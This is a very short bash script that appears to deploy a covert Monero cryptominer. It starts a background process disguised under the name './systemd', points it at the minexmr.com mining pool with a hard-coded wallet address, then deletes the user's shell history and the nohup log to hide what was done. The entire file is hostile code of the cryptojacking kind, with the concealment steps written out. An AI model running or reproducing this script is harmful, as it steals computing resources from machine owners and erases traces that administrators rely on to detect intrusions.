#!/usr/bin/env bash

nohup ./systemd -c x -M stratum+tcp://42g6ipPueA91EXjb7pDSvoEdjVoGKF5nfbfoDX1SiBfTg6qrxy2aoT73RetB79cxh1T5BgwWTcnn6XqwTgKRbbWo6Amv4ey:x@pool.minexmr.com:4444/xmr &
rm ~/.bash_history
rm nohup.out